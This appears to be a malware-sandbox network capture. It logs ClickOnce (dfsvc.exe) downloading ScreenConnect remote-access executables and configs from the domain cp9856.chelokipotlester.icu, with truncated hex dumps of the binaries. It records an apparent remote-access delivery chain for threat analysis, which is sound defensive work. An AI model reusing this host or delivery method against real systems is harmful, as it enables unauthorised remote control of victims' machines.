                                                                                                                                                                              Content-Length: 61216
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:44 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:44 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 22 97 a5 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 36 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 e4 d4 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL""06 @ @
                                                                                                                                                                              2024-10-29 18:34:44 UTC16384INData Raw: 4c 27 7b 0e 01 00 39 0c 65 0e 16 00 8b 16 7f 0e 16 00 58 0d 87 0e 36 00 6d 08 8f 0e 16 00 01 00 93 0e 06 00 ef 10 22 0a 06 00 60 10 22 0a 06 00 53 26 7b 0e 06 00 fa 1d 68 0e 06 00 31 0f 4b 00 06 00 04 1b 9d 0e 06 00 64 1f a1 0e 06 00 8a 27 a6 0e 06 00 95 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 d0 1c be 0e 16 00 b9 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 47 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 20 2f 01 0f 06 00 62 20 57 0e 06 00 d7 19 06 0f 06 00 e9 19 06 0f 06 00 81 19 0b 0f 16 00 b9 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54
                                                                                                                                                                              Data Ascii: L'{9eX6m"`"S&{h1Kd'"6m)6m76m%G6m6 /b W6mF)4k4sIT
                                                                                                                                                                              2024-10-29 18:34:44 UTC16384INData Raw: 56 65 72 74 69 63 61 6c 00 4d 61 72 73 68 61 6c 00 67 65 74 5f 48 6f 72 69 7a 6f 6e 74 61 6c 00 70 69 64 6c 00 73 65 61 72 63 68 42 6f 78 49 6e 70 75 74 4c 65 6e 67 74 68 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62
                                                                                                                                                                              Data Ascii: VerticalMarshalget_HorizontalpidlsearchBoxInputLengthThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollab
                                                                                                                                                                              2024-10-29 18:34:44 UTC12280INData Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 33 00 2e 00 39 00 2e 00 31 00 30 00 2e 00 38 00 38 00 31 00 37 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 33 00 2e 00 39 00 2e 00 31 00 30 00 2e 00 38 00 38 00 31 00 37
                                                                                                                                                                              Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion23.9.10.8817BAssembly Version23.9.10.8817


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.164972337.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:45 UTC123OUTGET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:34:46 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 266
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:45 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:46 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.164972437.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:47 UTC142OUTGET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:47 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 266
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:47 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:47 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.164972537.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:48 UTC126OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:34:48 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 266
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:48 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:48 UTC266INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.164972637.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:49 UTC140OUTGET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:49 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 81696
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:49 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:49 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 fc 8a d6 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 42 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 18 3c 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0@B^ `@ `<@
                                                                                                                                                                              2024-10-29 18:34:50 UTC16384INData Raw: 23 aa 5c f3 6c 56 17 f0 f7 5a 9d 5d 5d 8a 34 11 d7 6e ce 3f 00 00 00 00 98 55 92 92 00 00 00 00 02 00 00 00 7b 00 00 00 74 5d 00 00 74 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 f1 c9 85 49 b2 cd 9b 47 b3 c1 0c f0 28 72 19 e5 01 00 00 00 43 3a 5c 62 75 69 6c 64 73 5c 63 63 5c 63 77 63 6f 6e 74 72 6f 6c 5c 50 72 6f 64 75 63 74 5c 57 69 6e 64 6f 77 73 46 69 6c 65 4d 61 6e 61 67 65 72 5c 6f 62 6a 5c 52 65 6c 65 61 73 65 5c 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 46 69 6c 65 4d 61 6e 61 67 65 72 2e 70 64 62 00 17 5e 00 00 00 00 00 00 00 00 00 00 31 5e 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 23 5e 00 00 00 00 00 00 00 00 00 00 00 00 5f 43
                                                                                                                                                                              Data Ascii: #\lVZ]]4n?U{t]t?RSDSIG(rC:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb^1^ #^_C
                                                                                                                                                                              2024-10-29 18:34:50 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff
                                                                                                                                                                              Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                              2024-10-29 18:34:50 UTC16384INData Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00
                                                                                                                                                                              Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                              2024-10-29 18:34:50 UTC16376INData Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: n


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.164972737.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:51 UTC111OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:34:51 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 587040
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:51 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:51 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 74 77 50 c4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 c4 08 00 00 06 00 00 00 00 00 00 de dd 08 00 00 20 00 00 00 00 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 09 00 00 02 00 00 b8 61 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELtwP"0 @ @a@
                                                                                                                                                                              2024-10-29 18:34:51 UTC16384INData Raw: 00 2c 00 00 11 73 8a 07 00 06 0a 06 02 7d 03 03 00 04 28 77 01 00 0a 2c 1c 72 7d 0a 00 70 17 17 28 78 01 00 0a 28 79 01 00 0a 16 8d 11 00 00 01 28 7a 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 d1 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e 95 02 00 04 25 2d 17 26 7e 81 02 00 04 fe 06 01 07 00 06 73 d2 01 00 0a 25 80 95 02 00 04 28 33 00 00 2b 6f d3 01 00 0a 0d 38 cc 0b 00 00 12 04 09 6f d4 01 00 0a 7d 05 03 00 04 11 04 7b 05 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 05 03 00 04 6f 11 03 00 06 28 16 06 00 06 13 06 11 04 7b 05 03 00 04 6f 25 03 00 06 28 2a 06 00 06 13 07 11 04 7b 05 03 00 04 6f 26 03 00 06 28 2a 06 00 06 13 08 11 04 7b 05 03 00 04 6f 11 03 00 06 02 28 fb 00 00 06 25 13 0d 6f a4 00 00 0a 11 0d 13 09 16 13 0a 02 12 0b 12 0c
                                                                                                                                                                              Data Ascii: ,s}(w,r}p(x(y(z}H((((~%-&~s%(3+o8o}{(,+{o({o%(*{o&(*{o(%o
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 04 14 6f 7d 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 fd 13 00 70 18 8d 11 00 00 01 25 16 03 8c 2a 02 00 01 a2 25 17 02 7b 54 00 00 04 6f e6 06 00 06 8c ad 00 00 02 a2 28 0e 03 00 0a 02 7b 54 00 00 04 6f e6 06 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f a2 04 00 06 03 2d 22 02 28 ae 00 00 06 73 11 03 00 0a 6f 11 02 00 0a 2b 10 02 7b 5a 00 00 04 28 a9 00 00 06 6f a2 04 00 06 02 7b 54 00 00 04 16 6f a4 00 00 0a 02 7b 54 00 00 04 16 6f e7 06 00 06 2a 0a 14 2a 0a 14 2a 0a 16 2a 0a 14 2a 1a 73 1d 03 00 0a 7a 00 13 30 02 00 3d 01 00 00 00 00 00 00 03 d0 94 00 00 02 28 c2 00 00 0a 33 07 02 7b 4d 00 00 04 2a 03 d0 95 00 00 02 28 c2 00 00 0a 33 02 02 2a 03 d0 96 00 00 02 28
                                                                                                                                                                              Data Ascii: o}(<*(<*0Grp%*%{To({To..'+5{Z(o-"(so+{Z(o{To{To*****sz0=(3{M*(3*(
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: ce 02 00 06 2a 5e 02 03 28 2d 04 00 0a 02 28 c3 01 00 06 2c 07 02 17 28 a4 00 00 0a 2a 92 02 03 28 2e 04 00 0a 02 28 c3 01 00 06 2c 14 02 28 a2 00 00 0a 6f e2 01 00 0a 2d 07 02 16 28 a4 00 00 0a 2a 00 00 00 13 30 06 00 7f 00 00 00 64 00 00 11 02 03 28 2f 04 00 0a 02 28 bf 01 00 06 16 31 6e 02 28 c1 01 00 06 2c 66 12 00 02 28 2c 04 00 0a 0c 12 02 28 30 04 00 0a 02 28 2c 04 00 0a 0c 12 02 28 31 04 00 0a 02 28 f5 01 00 0a 02 28 2c 04 00 0a 0c 12 02 28 32 04 00 0a 59 02 28 eb 01 00 0a 02 28 2c 04 00 0a 0c 12 02 28 33 04 00 0a 59 28 07 01 00 0a 02 6f c8 01 00 06 0b 03 6f 34 04 00 0a 07 73 35 04 00 0a 06 6f 36 04 00 0a 2a 3a 02 03 28 37 04 00 0a 02 28 d0 01 00 06 2a 4a 02 28 a2 00 00 0a 6f e4 01 00 0a 02 28 d0 01 00 06 2a 00 00 00 13 30 02 00 1c 00 00 00 65 00
                                                                                                                                                                              Data Ascii: *^(-(,(*(.(,(o-(*0d(/(1n(,f(,(0(,(1((,(2Y((,(3Y(oo4s5o6*:(7(*J(o(*0e
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 06 02 03 6f fe 02 00 06 2a 3a 02 28 c4 02 00 06 02 03 6f fd 02 00 06 2a 00 13 30 02 00 4d 00 00 00 94 00 00 11 20 00 00 00 10 0a 02 28 93 02 00 06 2d 08 06 20 10 20 00 00 60 0a 02 28 91 02 00 06 1b 33 08 06 20 00 40 00 00 60 0a 02 28 ae 02 00 06 2d 06 06 16 60 0a 2b 04 06 17 60 0a 02 28 b0 02 00 06 2d 06 06 16 60 0a 2b 04 06 1a 60 0a 06 2a 5e 1e 28 1e 05 00 06 80 ed 00 00 04 18 28 1e 05 00 06 80 ee 00 00 04 2a 1e 02 7b 07 01 00 04 2a 00 00 00 13 30 03 00 5b 00 00 00 00 00 00 00 02 28 88 02 00 06 02 d0 a1 00 00 01 28 c2 00 00 0a 72 8a 25 00 70 28 38 06 00 06 28 8e 02 00 06 02 28 af 04 00 06 28 96 02 00 06 02 17 28 b5 02 00 06 02 28 5c 05 00 0a 28 9f 02 00 06 02 28 5c 05 00 0a 6f 0c 04 00 0a 02 17 28 b3 02 00 06 02 73 2c 09 00 06 7d 07 01 00 04 2a 3a 02 28
                                                                                                                                                                              Data Ascii: o*:(o*0M (- `(3 @`(-`+`(-`+`*^((*{*0[((r%p(8(((((\((\o(s,}*:(
                                                                                                                                                                              2024-10-29 18:34:52 UTC16384INData Raw: 7d 3d 01 00 04 02 7b 3d 01 00 04 1f 0a 1f 0a 1f 0a 1f 0a 28 9a 03 00 06 02 7b 3d 01 00 04 7e 8f 04 00 04 25 2d 17 26 7e 8e 04 00 04 fe 06 c3 09 00 06 73 07 06 00 0a 25 80 8f 04 00 04 6f 08 06 00 0a 02 73 51 04 00 0a 25 18 6f cc 02 00 0a 25 28 e3 04 00 06 6f f8 05 00 0a 25 16 6f a4 00 00 0a 25 17 6f 09 06 00 0a 25 20 00 01 00 00 6f 0a 06 00 0a 25 7e 09 01 00 0a 22 00 00 10 41 73 0a 01 00 0a 6f dc 00 00 0a 25 28 b0 04 00 06 6f 0d 04 00 0a 25 28 ba 04 00 06 6f 0c 04 00 0a 7d 3f 01 00 04 02 73 c0 09 00 06 25 1b 6f cc 02 00 0a 25 17 6f c6 04 00 0a 25 16 6f c7 04 00 0a 25 16 6f 0b 06 00 0a 25 16 6f 05 06 00 0a 7d 3e 01 00 04 02 7b 3e 01 00 04 02 fe 06 8f 03 00 06 73 8d 01 00 0a 6f 0c 06 00 0a 02 7b 3e 01 00 04 02 fe 06 97 03 00 06 73 85 01 00 0a 6f 0d 06 00 0a
                                                                                                                                                                              Data Ascii: }={=({=~%-&~s%osQ%o%(o%o%o% o%~"Aso%(o%(o}?s%o%o%o%o%o}>{>so{>so
